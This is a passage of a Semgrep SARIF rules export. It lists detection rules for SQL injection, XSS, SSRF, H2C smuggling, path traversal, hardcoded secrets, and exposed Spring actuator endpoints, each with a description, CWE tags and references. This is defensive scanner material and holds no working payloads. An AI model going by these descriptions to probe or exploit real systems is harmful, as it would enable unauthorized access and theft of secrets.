delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.pg.express-pg-sqli.express-pg-sqli)\n - [https://www.npmjs.com/package/pg](https://www.npmjs.com/package/pg)\n - [https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.pg.express-pg-sqli.express-pg-sqli","id":"javascript.express.pg.express-pg-sqli.express-pg-sqli","name":"javascript.express.pg.express-pg-sqli.express-pg-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.pg.express-pg-sqli.express-pg-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"$VAR.getRate() call on a Balancer pool is not protected from the read-only reentrancy."},"help":{"markdown":"$VAR.getRate() call on a Balancer pool is not protected from the read-only reentrancy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.balancer-readonly-reentrancy-getrate.balancer-readonly-reentrancy-getrate)\n - [https://forum.balancer.fi/t/reentrancy-vulnerability-scope-expanded/4345](https://forum.balancer.fi/t/reentrancy-vulnerability-scope-expanded/4345)\n","text":"$VAR.getRate() call on a Balancer pool is not protected from the read-only reentrancy."},"helpUri":"https://semgrep.dev/r/solidity.security.balancer-readonly-reentrancy-getrate.balancer-readonly-reentrancy-getrate","id":"solidity.security.balancer-readonly-reentrancy-getrate.balancer-readonly-reentrancy-getrate","name":"solidity.security.balancer-readonly-reentrancy-getrate.balancer-readonly-reentrancy-getrate","properties":{"precision":"very-high","tags":["CWE-841: Improper Enforcement of Behavioral Workflow","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.balancer-readonly-reentrancy-getrate.balancer-readonly-reentrancy-getrate"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a Context with autoescape disabled. If you are rendering any web pages, this exposes your application to cross-site scripting (XSS) vulnerabilities. Remove 'autoescape: False' or set it to 'True'."},"help":{"markdown":"Detected a Context with autoescape disabled. If you are rendering any web pages, this exposes your application to cross-site scripting (XSS) vulnerabilities. Remove 'autoescape: False' or set it to 'True'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.audit.xss.context-autoescape-off.context-autoescape-off)\n - [https://docs.djangoproject.com/en/3.1/ref/settings/#templates](https://docs.djangoproject.com/en/3.1/ref/settings/#templates)\n - [https://docs.djangoproject.com/en/3.1/topics/templates/#django.template.backends.django.DjangoTemplates](https://docs.djangoproject.com/en/3.1/topics/templates/#django.template.backends.django.DjangoTemplates)\n","text":"Detected a Context with autoescape disabled. If you are rendering any web pages, this exposes your application to cross-site scripting (XSS) vulnerabilities. Remove 'autoescape: False' or set it to 'True'."},"helpUri":"https://semgrep.dev/r/python.django.security.audit.xss.context-autoescape-off.context-autoescape-off","id":"python.django.security.audit.xss.context-autoescape-off.context-autoescape-off","name":"python.django.security.audit.xss.context-autoescape-off.context-autoescape-off","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.audit.xss.context-autoescape-off.context-autoescape-off"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Pod may use the node network namespace. This gives the pod access to the loopback device, services listening on localhost, and could be used to snoop on network activity of other pods on the same node. Remove the 'hostNetwork' key to disable this functionality."},"help":{"markdown":"Pod may use the node network namespace. This gives the pod access to the loopback device, services listening on localhost, and could be used to snoop on network activity of other pods on the same node. Remove the 'hostNetwork' key to disable this functionality.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.kubernetes.security.hostnetwork-pod.hostnetwork-pod)\n - [https://kubernetes.io/docs/concepts/policy/pod-security-policy/#host-namespaces](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#host-namespaces)\n","text":"Pod may use the node network namespace. This gives the pod access to the loopback device, services listening on localhost, and could be used to snoop on network activity of other pods on the same node. Remove the 'hostNetwork' key to disable this functionality."},"helpUri":"https://semgrep.dev/r/yaml.kubernetes.security.hostnetwork-pod.hostnetwork-pod","id":"yaml.kubernetes.security.hostnetwork-pod.hostnetwork-pod","name":"yaml.kubernetes.security.hostnetwork-pod.hostnetwork-pod","properties":{"precision":"very-high","tags":["CWE-406: Insufficient Control of Network Message Volume (Network Amplification)","LOW CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.kubernetes.security.hostnetwork-pod.hostnetwork-pod"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the `wkhtmltopdf` it can result in Server-Side Request Forgery vulnerabilities"},"help":{"markdown":"If unverified user data can reach the `wkhtmltopdf` it can result in Server-Side Request Forgery vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.wkhtmltopdf.security.audit.wkhtmltopdf-injection.wkhtmltopdf-injection)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"If unverified user data can reach the `wkhtmltopdf` it can result in Server-Side Request Forgery vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.wkhtmltopdf.security.audit.wkhtmltopdf-injection.wkhtmltopdf-injection","id":"javascript.wkhtmltopdf.security.audit.wkhtmltopdf-injection.wkhtmltopdf-injection","name":"javascript.wkhtmltopdf.security.audit.wkhtmltopdf-injection.wkhtmltopdf-injection","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.wkhtmltopdf.security.audit.wkhtmltopdf-injection.wkhtmltopdf-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.net.tainted-django-http-request-paramiko.tainted-django-http-request-paramiko)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.django.net.tainted-django-http-request-paramiko.tainted-django-http-request-paramiko","id":"python.django.net.tainted-django-http-request-paramiko.tainted-django-http-request-paramiko","name":"python.django.net.tainted-django-http-request-paramiko.tainted-django-http-request-paramiko","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.net.tainted-django-http-request-paramiko.tainted-django-http-request-paramiko"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Conditions for Nginx H2C smuggling identified. H2C smuggling allows upgrading HTTP/1.1 connections to lesser-known HTTP/2 over cleartext (h2c) connections which can allow a bypass of reverse proxy access controls, and lead to long-lived, unrestricted HTTP traffic directly to back-end servers. To mitigate: WebSocket support required: Allow only the value websocket for HTTP/1.1 upgrade headers (e.g., Upgrade: websocket). WebSocket support not required: Do not forward Upgrade headers."},"help":{"markdown":"Conditions for Nginx H2C smuggling identified. H2C smuggling allows upgrading HTTP/1.1 connections to lesser-known HTTP/2 over cleartext (h2c) connections which can allow a bypass of reverse proxy access controls, and lead to long-lived, unrestricted HTTP traffic directly to back-end servers. To mitigate: WebSocket support required: Allow only the value websocket for HTTP/1.1 upgrade headers (e.g., Upgrade: websocket). WebSocket support not required: Do not forward Upgrade headers.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.possible-h2c-smuggling.possible-nginx-h2c-smuggling)\n - [https://labs.bishopfox.com/tech-blog/h2c-smuggling-request-smuggling-via-http/2-cleartext-h2c](https://labs.bishopfox.com/tech-blog/h2c-smuggling-request-smuggling-via-http/2-cleartext-h2c)\n","text":"Conditions for Nginx H2C smuggling identified. H2C smuggling allows upgrading HTTP/1.1 connections to lesser-known HTTP/2 over cleartext (h2c) connections which can allow a bypass of reverse proxy access controls, and lead to long-lived, unrestricted HTTP traffic directly to back-end servers. To mitigate: WebSocket support required: Allow only the value websocket for HTTP/1.1 upgrade headers (e.g., Upgrade: websocket). WebSocket support not required: Do not forward Upgrade headers."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.possible-h2c-smuggling.possible-nginx-h2c-smuggling","id":"generic.nginx.security.possible-h2c-smuggling.possible-nginx-h2c-smuggling","name":"generic.nginx.security.possible-h2c-smuggling.possible-nginx-h2c-smuggling","properties":{"precision":"very-high","tags":["CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')","MEDIUM CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.possible-h2c-smuggling.possible-nginx-h2c-smuggling"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"This hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm."},"help":{"markdown":"This hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.crypto.insecure-hash.insecure-hash)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"This hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.crypto.insecure-hash.insecure-hash","id":"cpp.lang.security.crypto.insecure-hash.insecure-hash","name":"cpp.lang.security.crypto.insecure-hash.insecure-hash","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.crypto.insecure-hash.insecure-hash"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.pg.ruby-pg-hardcoded-secret.ruby-pg-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/ruby.pg.ruby-pg-hardcoded-secret.ruby-pg-hardcoded-secret","id":"ruby.pg.ruby-pg-hardcoded-secret.ruby-pg-hardcoded-secret","name":"ruby.pg.ruby-pg-hardcoded-secret.ruby-pg-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.pg.ruby-pg-hardcoded-secret.ruby-pg-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A hard-coded credential was detected. It is not recommended to store credentials in source-code, as this risks secrets being leaked and used by either an internal or external malicious adversary. It is recommended to use environment variables to securely provide credentials or retrieve credentials from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"A hard-coded credential was detected. It is not recommended to store credentials in source-code, as this risks secrets being leaked and used by either an internal or external malicious adversary. It is recommended to use environment variables to securely provide credentials or retrieve credentials from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.express-jwt-hardcoded-secret.express-jwt-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A hard-coded credential was detected. It is not recommended to store credentials in source-code, as this risks secrets being leaked and used by either an internal or external malicious adversary. It is recommended to use environment variables to securely provide credentials or retrieve credentials from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/javascript.express.security.express-jwt-hardcoded-secret.express-jwt-hardcoded-secret","id":"javascript.express.security.express-jwt-hardcoded-secret.express-jwt-hardcoded-secret","name":"javascript.express.security.express-jwt-hardcoded-secret.express-jwt-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.express-jwt-hardcoded-secret.express-jwt-hardcoded-secret"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". If this wasn't intentional, it's recommended to set the the `SameSite` attribute of the important cookies (e.g., session cookie) to either `Strict` or `Lax`. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement. You can use the Cookie Policy Middleware to globally set the `SameSite` attribute. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default."},"help":{"markdown":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". If this wasn't intentional, it's recommended to set the the `SameSite` attribute of the important cookies (e.g., session cookie) to either `Strict` or `Lax`. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement. You can use the Cookie Policy Middleware to globally set the `SameSite` attribute. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.cookies.cookie-samesite-none.cookie-samesite-none)\n - [https://learn.microsoft.com/en-us/aspnet/core/security/authentication/cookie?view=aspnetcore-8.0#cookie-policy-middleware](https://learn.microsoft.com/en-us/aspnet/core/security/authentication/cookie?view=aspnetcore-8.0#cookie-policy-middleware)\n - [https://learn.microsoft.com/en-us/dotnet/api/microsoft.aspnetcore.http.cookieoptions](https://learn.microsoft.com/en-us/dotnet/api/microsoft.aspnetcore.http.cookieoptions)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://web.dev/articles/samesite-cookies-explained](https://web.dev/articles/samesite-cookies-explained)\n","text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". If this wasn't intentional, it's recommended to set the the `SameSite` attribute of the important cookies (e.g., session cookie) to either `Strict` or `Lax`. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement. You can use the Cookie Policy Middleware to globally set the `SameSite` attribute. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.cookies.cookie-samesite-none.cookie-samesite-none","id":"csharp.dotnet-core.cookies.cookie-samesite-none.cookie-samesite-none","name":"csharp.dotnet-core.cookies.cookie-samesite-none.cookie-samesite-none","properties":{"precision":"very-high","tags":["CWE-1275: Sensitive Cookie with Improper SameSite Attribute","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.cookies.cookie-samesite-none.cookie-samesite-none"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"String argument $A is used to read or write data from a file via Path.Combine without direct sanitization via Path.GetFileName. If the path is user-supplied data this can lead to path traversal."},"help":{"markdown":"String argument $A is used to read or write data from a file via Path.Combine without direct sanitization via Path.GetFileName. If the path is user-supplied data this can lead to path traversal.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.filesystem.unsafe-path-combine.unsafe-path-combine)\n - [https://www.praetorian.com/blog/pathcombine-security-issues-in-aspnet-applications/](https://www.praetorian.com/blog/pathcombine-security-issues-in-aspnet-applications/)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.io.path.combine?view=net-6.0#remarks](https://docs.microsoft.com/en-us/dotnet/api/system.io.path.combine?view=net-6.0#remarks)\n","text":"String argument $A is used to read or write data from a file via Path.Combine without direct sanitization via Path.GetFileName. If the path is user-supplied data this can lead to path traversal."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.filesystem.unsafe-path-combine.unsafe-path-combine","id":"csharp.lang.security.filesystem.unsafe-path-combine.unsafe-path-combine","name":"csharp.lang.security.filesystem.unsafe-path-combine.unsafe-path-combine","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.filesystem.unsafe-path-combine.unsafe-path-combine"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for calls to without_protection during mass assignment (which allows record creation from hash values). This can lead to users bypassing permissions protections. For Rails 4 and higher, mass protection is on by default. Fix: Don't use :without_protection => true. Instead, configure attr_accessible to control attribute access."},"help":{"markdown":"Checks for calls to without_protection during mass assignment (which allows record creation from hash values). This can lead to users bypassing permissions protections. For Rails 4 and higher, mass protection is on by default. Fix: Don't use :without_protection => true. Instead, configure attr_accessible to control attribute access.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.unprotected-mass-assign.mass-assignment-vuln)\n - [https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_without_protection.rb](https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_without_protection.rb)\n - [https://www.acunetix.com/vulnerabilities/web/rails-mass-assignment/](https://www.acunetix.com/vulnerabilities/web/rails-mass-assignment/)\n","text":"Checks for calls to without_protection during mass assignment (which allows record creation from hash values). This can lead to users bypassing permissions protections. For Rails 4 and higher, mass protection is on by default. Fix: Don't use :without_protection => true. Instead, configure attr_accessible to control attribute access."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.unprotected-mass-assign.mass-assignment-vuln","id":"ruby.lang.security.unprotected-mass-assign.mass-assignment-vuln","name":"ruby.lang.security.unprotected-mass-assign.mass-assignment-vuln","properties":{"precision":"very-high","tags":["CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes","LOW CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.unprotected-mass-assign.mass-assignment-vuln"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"RegExp() called with a `$ARG` function argument, this might allow an attacker to cause a Regular Expression Denial-of-Service (ReDoS) within your application as RegExP blocks the main thread. For this reason, it is recommended to use hardcoded regexes instead. If your regex is run on user-controlled input, consider performing input validation or use a regex checking/sanitization library such as https://www.npmjs.com/package/recheck to verify that the regex does not appear vulnerable to ReDoS."},"help":{"markdown":"RegExp() called with a `$ARG` function argument, this might allow an attacker to cause a Regular Expression Denial-of-Service (ReDoS) within your application as RegExP blocks the main thread. For this reason, it is recommended to use hardcoded regexes instead. If your regex is run on user-controlled input, consider performing input validation or use a regex checking/sanitization library such as https://www.npmjs.com/package/recheck to verify that the regex does not appear vulnerable to ReDoS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp)\n - [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n","text":"RegExp() called with a `$ARG` function argument, this might allow an attacker to cause a Regular Expression Denial-of-Service (ReDoS) within your application as RegExP blocks the main thread. For this reason, it is recommended to use hardcoded regexes instead. If your regex is run on user-controlled input, consider performing input validation or use a regex checking/sanitization library such as https://www.npmjs.com/package/recheck to verify that the regex does not appear vulnerable to ReDoS."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp","id":"javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp","name":"javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp","properties":{"precision":"very-high","tags":["CWE-1333: Inefficient Regular Expression Complexity","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Spring Boot Actuator is fully enabled. This exposes sensitive endpoints such as /actuator/env, /actuator/logfile, /actuator/heapdump and others. Unless you have Spring Security enabled or another means to protect these endpoints, this functionality is available without authentication, causing a significant security risk."},"help":{"markdown":"Spring Boot Actuator is fully enabled. This exposes sensitive endpoints such as /actuator/env, /actuator/logfile, /actuator/heapdump and others. Unless you have Spring Security enabled or another means to protect these endpoints, this functionality is available without authentication, causing a significant security risk.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.audit.spring-actuator-fully-enabled.spring-actuator-fully-enabled)\n - [https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-features.html#production-ready-endpoints-exposing-endpoints](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-features.html#production-ready-endpoints-exposing-endpoints)\n - [https://medium.com/walmartglobaltech/perils-of-spring-boot-actuators-misconfiguration-185c43a0f785](https://medium.com/walmartglobaltech/perils-of-spring-boot-actuators-misconfiguration-185c43a0f785)\n - [https://blog.maass.xyz/spring-actuator-security-part-1-stealing-secrets-using-spring-actuators](https://blog.maass.xyz/spring-actuator-security-part-1-stealing-secrets-using-spring-actuators)\n","text":"Spring Boot Actuator is fully enabled. This exposes sensitive endpoints such as /actuator/env, /actuator/logfile, /actuator/heapdump and others. Unless you have Spring Security enabled or another means to protect these endpoints, this functionality is available without authentication, causing a significant security risk."},"helpUri":"https://semgrep.dev/r/java.spring.security.audit.spring-actuator-fully-enabled.spring-actuator-fully-enabled","id":"java.spring.security.audit.spring-actuator-fully-enabled.spring-actuator-fully-enabled","name":"java.spring.security.audit.spring-actuator-fully-enabled.spring-actuator-fully-enabled","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.audit.spring-actuator-fully-enabled.spring-actuator-fully-enabled"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"A CSRF middleware was not detected in your express application. Ensure you are either using one such as `csurf` or `csrf` (see rule references) and/or you are properly doing CSRF validation in your routes with a token or cookies."},"help":{"markdown":"A CSRF middleware was not detected in your express application. Ensure you are either using one such as `csurf` or `csrf` (see rule references) and/or you are properly doing CSRF validation in your routes with a token or cookies.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.audit.express-check-csurf-middleware-usage.express-check-csurf-middleware-usage)\n - [https://www.npmjs.com/package/csurf](https://www.npmjs.com/package/csurf)\n - [https://www.npmjs.com/package/csrf](https://www.npmjs.com/package/csrf)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"A CSRF middleware was not detected in your express application. Ensure you are either using one such as `csurf` or `csrf` (see rule references) and/or you are properly doing CSRF validation in your routes with a token or cookies."},"helpUri":"https://semgrep.dev/r/javascript.express.security.audit.express-check-csurf-middleware-usage.express-check-csurf-middleware-usage","id":"javascript.express.security.audit.express-check-csurf-middleware-usage.express-check-csurf-middleware-usage","name":"javascript.express.security.audit.express-check-csurf-middleware-usage.express-check-csurf-middleware-usage","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.audit.express-check-csurf-middleware-usage.express-check-csurf-middleware-usage"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-toml-fastapi.tainted-path-traversal-toml-fastapi)\n - [https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths](https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - 